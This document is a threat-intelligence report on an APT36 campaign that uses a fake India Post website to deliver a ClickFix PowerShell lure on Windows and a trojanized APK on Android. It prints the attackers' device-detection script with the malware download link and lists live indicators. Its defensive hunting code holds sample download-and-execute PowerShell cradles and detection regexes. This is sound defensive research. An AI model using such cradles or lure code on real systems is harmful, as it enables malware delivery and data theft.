
Pakistan APT Hackers Create Weaponized IndiaPost Website to Attack Windows & Android Users

Document Control

Pakistan APT Hackers Create Weaponized IndiaPost Website to Attack Windows & Android Users

Document No:
Revision Status:
Effective Date:
Last Review Date:
Approved by
Preparer Name:
Signature
Date:

Document Revision History

Publication Date    Author                 Revision No    Change Description
27-03-2025          Tushar Subhra Dutta    -              Initial Document Creation

Table of Contents

1. Introduction
2. Incident Overview
3. Attack Methodology
4. Indicators of Compromise (IoCs)
5. Recommendations
6. Conclusion
7. References

1. Introduction

Cybersecurity researchers have uncovered a sophisticated attack campaign that uses a fraudulent
website impersonating India Post, the Indian postal service. The attack targets both Windows and
Android users, delivering malware through payloads tailored to the visitor's platform. The campaign
demonstrates techniques attributed to the Pakistan-based Advanced Persistent Threat (APT) group
APT36 (Transparent Tribe), which has targeted Indian entities since 2013.

2. Incident Overview

The malicious website, hosted at postindia[.]site, uses client-side (JavaScript) user-agent
detection to deliver operating-system-specific payloads:

• Windows users: prompted to download a malicious PDF containing instructions to execute a
  PowerShell command.
• Android users: encouraged to download a trojanized APK (indiapost.apk) that requests extensive
  permissions in order to harvest sensitive data.

Malicious indiapost.apk (Source – Cyfirma)

Researchers from Cyfirma identified this campaign in March 2025, linking its origin to Pakistan
through forensic metadata analysis. The attack infrastructure includes IP addresses and domains
crafted to mimic Indian government entities, a known tactic of APT36.

3. Attack Methodology

3.1. Initial Access

• The victim is lured to postindia[.]site via phishing emails or social engineering tactics.
• The website detects the visitor’s device type using JavaScript.

3.2. Payload Delivery

• Windows: Users are prompted to download a PDF with “ClickFix” instructions that
execute a PowerShell command, deploying malware.
• Android: Users receive a download prompt for indiapost.apk, which disguises itself as a
Google Accounts app.

3.3. Execution & Persistence

• The Android malware registers a BootReceiver component so that it is relaunched automatically
  after every device reboot.
• The malware requests excessive permissions, including access to contacts, location, and
  clipboard data.
• The APK asks to be exempted from battery optimization so that Android does not suspend it in
  the background, keeping it running continuously.

3.4. Command & Control (C2) Communication

• The malware communicates with C2 infrastructure linked to domains mimicking Indian
  government sites.
• The identified IP address 88[.]222[.]245[.]211 is associated with these operations.

❖ Infection Mechanism Analysis

The infection mechanism of this campaign showcases a multi-platform approach, using
JavaScript-based device detection to deliver tailored payloads.

Web-Based Device Detection

• The malicious website uses JavaScript to differentiate between desktop and mobile users by
  testing navigator.userAgent.
• Depending on the device type, the user is served either a Windows-based attack vector (a PDF
  download, hosted on Google Drive) or an Android-based malware (an APK download served from
  the site itself).

Snippet from the page's inline script. dialogTitle and actionButton are references to the page's
dialog heading and download-button elements, assigned elsewhere in the same script:

function detectDevice() {
  // Crude mobile check on the user agent. Note that iOS devices also match and are
  // then offered an Android APK they cannot install; only Android victims proceed.
  const isMobile = /iPhone|iPad|iPod|Android/.test(navigator.userAgent);
  if (isMobile) {
    // Mobile branch: trojanized APK served directly from the phishing site.
    dialogTitle.textContent = "Get Our App";
    actionButton.href = "https://postindia.site/download/indiapost.apk";
  } else {
    // Desktop branch: the "ClickFix" PDF, staged on Google Drive.
    dialogTitle.textContent = "Download Tracking Information";
    actionButton.href = "https://drive.usercontent.google.com/download?id=1RSILmV3HDR6APXKWEPXrg2MRP1d2xwmb&export=download";
  }
}

HTML code contains a JavaScript function

Windows Infection Process

• Users are tricked into downloading a malicious PDF containing “ClickFix” instructions.
• The PDF instructs victims to press Win+R and paste a PowerShell command into the Run dialog;
  executing it installs the malware. Because the victim runs the command themselves, no exploit
  is needed and the launch is an interactive process started from the Windows shell.
• The PowerShell script downloads and executes further payloads to establish persistence
  and exfiltrate data.
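The detection a defender would want for this stage, as an added example that is not part of the report or of Cyfirma's research: a Win+R lure leaves a distinctive shape in process telemetry (explorer.exe spawning powershell.exe with a download cradle on the command line) and in the victim's RunMRU registry key, which records what was typed into the Run dialog. The events, host names and URLs below are constructed for illustration, not real telemetry from this campaign.

```python
"""Hunt for ClickFix-style PowerShell launches in process-creation telemetry.

Added example; not code from the report or from Cyfirma. The events below are
constructed Sysmon Event ID 1 / Security 4688-style records, not real telemetry.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed sample events (host names, paths and URLs are placeholders).
SAMPLE_EVENTS = [
    ProcEvent("WS-01", EXPLORER, PS_PATH,
              'powershell.exe -w hidden -nop -c "iwr https://example.invalid/a.ps1 -UseBasicParsing | iex"'),
    ProcEvent("WS-02", EXPLORER, PS_PATH,
              "powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcEvent("WS-03", r"C:\Program Files\Microsoft VS Code\Code.exe", PS_PATH,
              r"powershell.exe -NoLogo -NoProfile -File .\build.ps1"),
    ProcEvent("WS-04", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c whoami"),
    ProcEvent("WS-05", EXPLORER, PS_PATH, "powershell.exe"),
]

# Download-cradle and evasion tokens typical of pasted one-liners.
CRADLE_RE = re.compile(
    r"\biwr\b|invoke-webrequest|invoke-restmethod|\bcurl\b|\bwget\b"
    r"|downloadstring|downloadfile|net\.webclient|frombase64string"
    r"|\biex\b|invoke-expression|\bmshta\b"
    r"|-e(nc|ncodedcommand)?\s|-w(indowstyle)?\s+hidden",
    re.IGNORECASE,
)


def cradle_tokens(command_line: str) -> list[str]:
    """Return the matched suspicious tokens, lower-cased and de-duplicated."""
    return sorted({m.group(0).lower().strip() for m in CRADLE_RE.finditer(command_line)})


def is_clickfix_candidate(ev: ProcEvent) -> bool:
    """explorer.exe -> powershell.exe with a cradle is the Win+R paste pattern.
    PowerShell started by an IDE, a scheduler or a service is left to other
    rules so that this one stays low-noise."""
    shell_parent = ev.parent_image.lower().endswith("\\explorer.exe")
    ps_child = ev.image.lower().endswith(("\\powershell.exe", "\\pwsh.exe"))
    return shell_parent and ps_child and bool(cradle_tokens(ev.command_line))


def hunt(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    """Return (host, matched tokens) for every event that fits the pattern."""
    return [(ev.host, cradle_tokens(ev.command_line)) for ev in events if is_clickfix_candidate(ev)]


def suspicious_runmru(values: dict[str, str]) -> list[str]:
    """Check Win+R history exported from
    HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU.
    Each value is stored as '<command>\\1'; MRUList only holds the ordering."""
    hits = []
    for name, value in values.items():
        if name == "MRUList":
            continue
        command = value[:-2] if value.endswith("\\1") else value
        if cradle_tokens(command):
            hits.append(command)
    return hits


if __name__ == "__main__":
    for host, tokens in hunt(SAMPLE_EVENTS):
        print(f"{host}: ClickFix candidate, tokens={tokens}")
    # Constructed RunMRU export from the same kind of victim.
    print(suspicious_runmru({"a": 'powershell -w hidden -c "iwr https://example.invalid/a.ps1 | iex"\\1',
                             "b": "notepad\\1", "MRUList": "ab"}))
```

The parent-process condition is what keeps this rule quiet: build tools and services start PowerShell all day, but an interactive explorer.exe parent plus a cradle is rare outside a paste-this-command lure. The RunMRU check is the forensic counterpart for a host that was not under EDR coverage at the time.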

Android Infection Process

• The APK file (indiapost.apk) masquerades as a Google Accounts app.
• Once installed, it requests excessive permissions such as:
  o Access to contacts
  o Location tracking
  o Clipboard monitoring
• The malware ensures persistence through a BootReceiver component that relaunches it
  automatically when the device reboots.
• It asks to be exempted from battery optimization so that Android does not suspend it, keeping
  it running and in contact with its C2 server.

Attack Chain
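How an analyst would confirm those Android traits from a decoded manifest, as an added example that is not code from the report or from Cyfirma. The manifest below is constructed to exercise the checks: the package name, component names and permission set are illustrative, not recovered from the real indiapost.apk. Run the same function on the AndroidManifest.xml that apktool writes when it decodes an APK.

```python
"""Triage a decoded AndroidManifest.xml for the traits the report attributes to indiapost.apk:
a boot receiver for persistence, a battery-optimization exemption, broad data-access
permissions, and a Google-branded label on a package that is not Google's.

Added example; not code from the report or from Cyfirma. The manifest is constructed.
"""
from __future__ import annotations

import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
BOOT_ACTION = "android.intent.action.BOOT_COMPLETED"
BATTERY_PERM = "android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"

# Permissions that give broad access to user data or let the app resist being stopped.
HIGH_RISK_PERMS = {
    "android.permission.READ_CONTACTS",
    "android.permission.READ_SMS",
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_CALL_LOG",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.ACCESS_BACKGROUND_LOCATION",
    "android.permission.RECORD_AUDIO",
    "android.permission.CAMERA",
    "android.permission.READ_EXTERNAL_STORAGE",
    "android.permission.BIND_ACCESSIBILITY_SERVICE",
    BATTERY_PERM,
}

# Constructed decoded manifest (apktool output style); not the real sample.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.postapp">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
  <application android:label="Google Accounts">
    <receiver android:name=".BootReceiver" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""


def android_attr(el: ET.Element, name: str) -> str | None:
    """Read an android:-namespaced attribute."""
    return el.get(f"{{{ANDROID_NS}}}{name}")


def triage_manifest(xml_text: str) -> dict:
    root = ET.fromstring(xml_text)
    package = root.get("package", "")
    perms = {android_attr(p, "name") for p in root.iter("uses-permission")}
    app = root.find("application")
    label = android_attr(app, "label") if app is not None else None

    # Persistence: any receiver registered for BOOT_COMPLETED restarts the app after reboot.
    boot_receivers = [
        android_attr(rcv, "name")
        for rcv in root.iter("receiver")
        if any(android_attr(a, "name") == BOOT_ACTION for a in rcv.iter("action"))
    ]

    # Impersonation heuristic: a Google-branded label on a package outside com.google.*.
    brand_mismatch = bool(label) and "google" in label.lower() and not package.startswith("com.google.")

    findings = {
        "package": package,
        "label": label,
        "high_risk_permissions": sorted(perms & HIGH_RISK_PERMS),
        "boot_receivers": boot_receivers,
        "ignores_battery_optimization": BATTERY_PERM in perms,
        "google_brand_mismatch": brand_mismatch,
    }
    # Clipboard reads need no manifest permission, so that capability is invisible here
    # and has to be confirmed in the decompiled code (look for ClipboardManager usage).
    findings["suspicious"] = brand_mismatch or (
        bool(boot_receivers)
        and findings["ignores_battery_optimization"]
        and len(findings["high_risk_permissions"]) >= 2
    )
    return findings


if __name__ == "__main__":
    for key, value in triage_manifest(SAMPLE_MANIFEST).items():
        print(f"{key}: {value}")
```

The manifest answers three of the four questions the report raises (boot persistence, battery-optimization exemption, permission scope); clipboard monitoring is the one that does not show up there, which is why the verdict comment points at the decompiled classes instead.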

4. Indicators of Compromise (IoCs)

4.1. Malicious Domains & IPs

• postindia[.]site
• email[.]gov[.]in[.]gov-in[.]mywire[.]org
• 88[.]222[.]245[.]211

4.2. Malicious Files

• indiapost.apk
• PDF file containing PowerShell execution commands

4.3. Tactics, Techniques, and Procedures (TTPs)

• Social engineering through phishing websites
• Device-aware payload distribution
• Malware persistence via a BootReceiver component
• Evasion techniques to bypass security controls

5. Recommendations

To mitigate risks associated with this attack campaign, organizations should implement the
following security measures:

5.1. Endpoint Security

• Deploy Endpoint Detection and Response (EDR) solutions to detect and block malicious
activity.
• Ensure Windows Defender and third-party AV solutions are updated with the latest
signatures.

5.2. User Awareness & Training

• Educate users on recognizing phishing attempts and suspicious websites.
• Instruct users never to paste commands from a website or document into the Run dialog
  (Win+R), PowerShell, or a terminal; that single step is what the “ClickFix” lure depends on.

5.3. Mobile Security Measures

• Restrict sideloading (APK installations from unknown sources), enforced by policy rather than
  left to the user.
• Implement Mobile Device Management (MDM) to enforce security policies.
• Monitor devices for unauthorized applications requesting excessive permissions, in particular
  apps that register to run at boot or request exemption from battery optimization.

5.4. Network Security

• Block the IoCs listed in section 4 at the firewall and proxy level.
• Monitor DNS requests for suspicious domain activity, including lookups of subdomains of the
  listed domains.
• Enforce strict access control policies to prevent unauthorized execution of scripts, for
  example by restricting PowerShell for standard users with AppLocker/WDAC rules or
  Constrained Language Mode.
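Matching the published indicators against logs, as an added example that serves both the IoC list in section 4.1 and the blocking and DNS-monitoring advice above; it is not tooling from the report or from Cyfirma. The log lines are constructed (a BIND-style query log and a Squid-style access log); the indicators are the three from section 4.1, refanged before use so the list can be pasted in as published. Matching is done on the extracted host, never on the raw line, so a path that merely contains the string does not produce a false hit, and subdomains of a listed domain are caught.

```python
"""Match defanged IoCs against DNS and proxy log lines.

Added example; not tooling from the report or from Cyfirma. Log lines are
constructed; the IoCs are the ones published in section 4.1.
"""
from __future__ import annotations

import ipaddress
import re
from urllib.parse import urlsplit

IOCS = [
    "postindia[.]site",
    "email[.]gov[.]in[.]gov-in[.]mywire[.]org",
    "88[.]222[.]245[.]211",
]

# Constructed log lines. indiapost.gov.in is the legitimate India Post domain and must not match;
# the last line carries the IoC only in the URL path of an unrelated host and must not match either.
SAMPLE_LOGS = [
    "27-Mar-2025 10:01:02.001 client 10.0.0.15#53211: query: postindia.site IN A +",
    "27-Mar-2025 10:01:03.120 client 10.0.0.15#53212: query: www.postindia.site IN A +",
    "27-Mar-2025 10:02:10.500 client 10.0.0.22#40011: query: indiapost.gov.in IN A +",
    "1743069722.123 10.0.0.15 TCP_MISS/200 5120 GET http://postindia.site/download/indiapost.apk",
    "1743069730.456 10.0.0.31 TCP_TUNNEL/200 800 CONNECT 88.222.245.211:443",
    "1743069740.789 10.0.0.31 TCP_MISS/200 1200 GET http://example.org/postindia.site.html",
]

DNS_RE = re.compile(r"query: (?P<qname>\S+) IN ")
PROXY_RE = re.compile(r"^\S+ (?P<client>\S+) \S+ \d+ (?P<method>[A-Z]+) (?P<target>\S+)")


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into a usable host or IP."""
    return ioc.replace("[.]", ".").replace("hxxp", "http").strip().lower().rstrip(".")


def split_iocs(iocs: list[str]) -> tuple[set[str], set[str]]:
    """Separate IPs from domains so each gets the right comparison."""
    domains: set[str] = set()
    ips: set[str] = set()
    for raw in iocs:
        value = refang(raw)
        try:
            ips.add(str(ipaddress.ip_address(value)))
        except ValueError:
            domains.add(value)
    return domains, ips


def domain_matches(name: str, domains: set[str]) -> bool:
    # Exact match or any subdomain; 'notpostindia.site' must not match 'postindia.site'.
    return any(name == d or name.endswith("." + d) for d in domains)


def extract_hosts(line: str) -> list[str]:
    """Pull the queried name or the proxied destination host out of a log line."""
    m = DNS_RE.search(line)
    if m:
        return [m.group("qname")]
    m = PROXY_RE.match(line)
    if m:
        target = m.group("target")
        if m.group("method") == "CONNECT":  # host:port, no scheme
            return [target.rsplit(":", 1)[0]]
        return [urlsplit(target).hostname or ""]
    return []


def scan(lines: list[str], iocs: list[str] = IOCS) -> list[tuple[str, str]]:
    """Return (matched host, log line) for every line whose destination is an IoC."""
    domains, ips = split_iocs(iocs)
    hits = []
    for line in lines:
        for host in extract_hosts(line):
            host = host.lower().rstrip(".")
            if host in ips or domain_matches(host, domains):
                hits.append((host, line))
    return hits


if __name__ == "__main__":
    for host, line in scan(SAMPLE_LOGS):
        print(f"IoC hit on {host}: {line}")
```

The subdomain rule matters for this campaign: the second domain in the list is itself a long chain of labels under mywire[.]org built to look like a gov.in address, and the site that serves the APK may be reached as www or through another label, so an exact-string comparison would miss it.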

5.5. Incident Response Preparedness

• Conduct regular threat hunting activities to identify potential compromises.
• Establish an incident response plan for handling suspected APT activities.

6. Conclusion

The latest campaign by APT36 highlights the evolving sophistication of nation-state-sponsored
cyber threats. By leveraging fake government websites, targeted malware payloads, and advanced
persistence techniques, the attackers aim to compromise both Windows and Android users.

7. References

• Cyber Security News: “Pakistan APT Hackers Create Weaponized IndiaPost Website to Attack
  Windows & Android Users”
